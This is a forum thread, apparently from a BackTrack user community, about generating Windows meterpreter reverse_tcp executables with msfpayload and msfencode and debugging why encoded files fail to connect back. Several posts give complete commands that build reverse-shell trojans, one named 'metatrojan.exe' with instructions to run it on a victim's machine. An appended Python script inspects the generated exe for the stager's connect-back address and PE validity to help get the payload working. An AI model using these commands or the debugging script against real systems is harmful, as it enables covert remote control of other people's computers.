
Thread: ./msfencode ?

#1 loop4me (Junior Member, joined Mar 2008, 54 posts)

    ./msfencode ?

    .I'm trying to look back at the phoenix910 post; it's about encoding the payload, meterpreter reverse_tcp, and executing it on the victim box

    ./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.2 LPORT=5555 R | ./msfencode -b '' -t exe -o output.exe

    .No problem with bt3 and ./msfencode. The output.exe works fine, and the victim connects back

    .But the same output.exe that was encoded on the bt4 pre, same command used, is not working!

    .In the first place I thought it was some problem with the NAT or some iptables rules. But I ran packetyzer on the victim box and no packets were sent, no connection tried

    .Tried with updated msf but no good.
    .The funny part is that the old output.exe that was encoded on a bt3 works on the victim box and connects back to bt4pre, with multi/handler started and the options set (LHOST=192.168.1.2 LPORT=5555)
    .That could be a problem with the encoder or something, maybe ruby libs
    .Any ideas?

#2 loop4me (Junior Member, joined Mar 2008, 54 posts)

    .Is there someone who managed to use ./msfencode successfully on bt4pre? .To get a working executable file.

    .I'll be thankful for any response, 'cause I tried with the other encoders supported by msf, but no results

#3 Junior Member (joined Dec 2007, 76 posts)

    ./msfpayload windows/meterpreter/reverse_tcp LHOST=11.11.11.11 LPORT=4444 R | ./msfencode -e x86/countdown -t raw | ./msfencode -t exe -o /revpayload.exe

#4 loop4me (Junior Member, joined Mar 2008, 54 posts)

    .ecsployt, thanks for the reply. It's a good combination, but I still got the same problem. Hm, not exactly the same, 'cause I managed to encode a working output.exe, but after 100 attempts
    .using the very same command on the livecd on the vmware. It's so confusing, 'cause I installed the bt from that livecd after the success, and when I tried again to make a working exe, no good, it's not working. Then I tried to boot from the livecd again and do the same thing. It's not working!

    .I tried so many things. Reinstalling ruby framework bt, booting from iso, livecd etc. ( X > output.exe without encoder, nothing)
    And all I can come up with is that this is some kind of problem related to vmware. It is a little frustrating 'cause I was working on this for 5 days and the result is 'in most cases the encoded output.exe is not working but u can reboot and try again'

    .I don't wanna be boring, maybe it's time for me to make a new setup on my box, reinstall vmware...
    .So if anyone has an extra minute to try... help

#5 Junior Member (joined Dec 2007, 76 posts)

    I'm not sure what your problem may be. If you're thinking about reinstalling bt4pre to a virtual machine, why don't you try VirtualBox instead? I'm using that, and it's really good. And open source. The added tools install without a problem to bt4pre as well.

    Sorry I can't be of more help.

#6 loop4me (Junior Member, joined Mar 2008, 54 posts)

    .This is just crazy!!!
    .Yesterday I removed my desktop distro and installed BT-pre on my box. Why not, it's a full distro now and I'm spending so much time on it. Everything works just fine
    .I have vmware 6.5.2 now on bt
    .6.5.0 was on my last distro

    .But, guess what??
    First thing I did was launching vmware, installing xpsp1 and xpsp2 and booting the bt-pre under vmware. I just couldn't wait to see the line "meterpreter>"
    .F*k!!!!!!!! The output.exe encoded on bt4-pre (running under vmware) is not working!!! Something is wrong here.

    .I encoded the same one on my desktop bt4-pre, main distro now (vmware is running on it)
    .It's working and I get my daily dose of meterpreter

    .Well, I'm gonna try to run those not-working exes in the presence of a debugger and see what the hell is wrong with them
    .Any suggestion?

#7 Developer (joined Mar 2007, 6,126 posts)

    Starting every sentence with a period does not speak well for your computer skills.

#8 loop4me (Junior Member, joined Mar 2008, 54 posts)

    .Well, I'm working on improving my computer skills. So pureh@te, I really appreciate your help

#9 BigMac (Senior Member, joined Jan 2008, 213 posts)

    Try fast-track... there is an option to create the executable with fast-track. By default msfpayload uses the shikata_ga_nai encoder unless told otherwise...

    ./msfpayload -h
    ./msfencode -h

    Search through my recent posts; I posted lots of info on this subject and a few others contributed to the thread...

#10 Just burned his ISO (joined Jun 2009, 2 posts)

    BT4? Do it like this as root:
    ./msfpayload windows/meterpreter/reverse_tcp lhost=[your ip] lport=[port] R | ./msfencode -e x86/fnstenv_mov -t exe > metatrojan.exe

    Run multi/handler and set the payload to windows/meterpreter/reverse_tcp. Then execute the trojan on the victim's machine; it should connect.
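The thread's symptom is an exe that runs on the victim but never even attempts a connection, and the suggested remedies are all "regenerate and retry". Before blaming NAT, iptables or VMware, two things can be checked on the attacker side, offline, against the file itself: whether the generated file is still a well-formed PE at all (a broken template or encode step breaks this), and whether an unencoded build (msfpayload with X, or no encoder) actually carries the stager for the LHOST/LPORT you expect. The script below is an added example written for this page; it is not code from the thread or from the Metasploit project. Its one assumption about layout is that the x86 reverse_tcp stager builds its sockaddr_in with two immediate pushes, `push <LHOST in network byte order>` followed by `push <AF_INET=2, LPORT big-endian>`, which is the sequence the block_reverse_tcp stager has used; if the stager was piped through msfencode those bytes are transformed and the pattern will (correctly) not be found. The sample "exe" bytes are constructed inline so the script runs without Metasploit; pass a real path, LHOST and LPORT on the command line to check an actual output.exe.

```python
"""Offline sanity checks for a reverse_tcp executable built with msfpayload | msfencode.

Added example for this page, not code from the thread or from Metasploit.

Checks performed:
  1. The file is a well-formed PE: "MZ" header and e_lfanew pointing at "PE\0\0".
  2. The *unencoded* x86 reverse_tcp stager for the expected LHOST/LPORT is
     present in the clear. Assumption: the stager builds its sockaddr_in as
         push <LHOST, network byte order>     -> 68 c0 a8 01 02   (192.168.1.2)
         push <AF_INET=2, LPORT big-endian>   -> 68 02 00 15 b3   (port 5555)
     Found    -> stager is plain (e.g. built with X) and points where you think.
     Not found -> stager was encoded, or the file is not what you think it is.

The sample "exe" produced by build_sample_exe() is constructed here so the
script runs offline; it is not a real Metasploit template.
"""
import ipaddress
import struct
import sys


def stager_sockaddr_bytes(lhost, lport):
    """The two push instructions the plain x86 reverse_tcp stager uses."""
    ip = ipaddress.IPv4Address(lhost).packed           # network byte order
    return b"\x68" + ip + b"\x68\x02\x00" + struct.pack(">H", lport)


def is_pe(data):
    """True if data has an MZ header whose e_lfanew points at 'PE\\0\\0'."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    return data[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"


def find_plain_stager(data, lhost, lport):
    """Offset of the unencoded sockaddr pushes, or -1 if not present."""
    return data.find(stager_sockaddr_bytes(lhost, lport))


def check_exe(data, lhost, lport):
    """Combined verdict for one file."""
    offset = find_plain_stager(data, lhost, lport)
    return {
        "valid_pe": is_pe(data),
        "plain_stager": offset != -1,
        "stager_offset": offset,
    }


def build_sample_exe(lhost, lport, xor_key=None):
    """Constructed minimal 'PE' carrying a stager fragment, for offline runs.

    xor_key=None leaves the stager bytes in the clear; an int key XORs them,
    standing in for what an encoder does to the bytes.
    """
    stub = b"MZ" + b"\x00" * 0x3A + struct.pack("<I", 0x40)   # e_lfanew = 0x40
    stub += b"PE\x00\x00" + b"\x00" * 0x1C                    # "PE\0\0" at 0x40
    stager = stager_sockaddr_bytes(lhost, lport)
    if xor_key is not None:
        stager = bytes(b ^ xor_key for b in stager)
    return stub + b"\x90" * 8 + stager + b"\xcc" * 8


if __name__ == "__main__":
    if len(sys.argv) == 4:   # python check_exe.py output.exe 192.168.1.2 5555
        with open(sys.argv[1], "rb") as f:
            blob = f.read()
        print(check_exe(blob, sys.argv[2], int(sys.argv[3])))
    else:
        plain = build_sample_exe("192.168.1.2", 5555)
        encoded = build_sample_exe("192.168.1.2", 5555, xor_key=0x41)
        print("plain  :", check_exe(plain, "192.168.1.2", 5555))
        print("encoded:", check_exe(encoded, "192.168.1.2", 5555))
```

A file that fails the PE check will never reach the stager on the victim, which matches the "no packets sent" observation; an encoded file that passes the PE check but still never connects is the case where a debugger on the victim, as suggested in the thread, is the next step.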
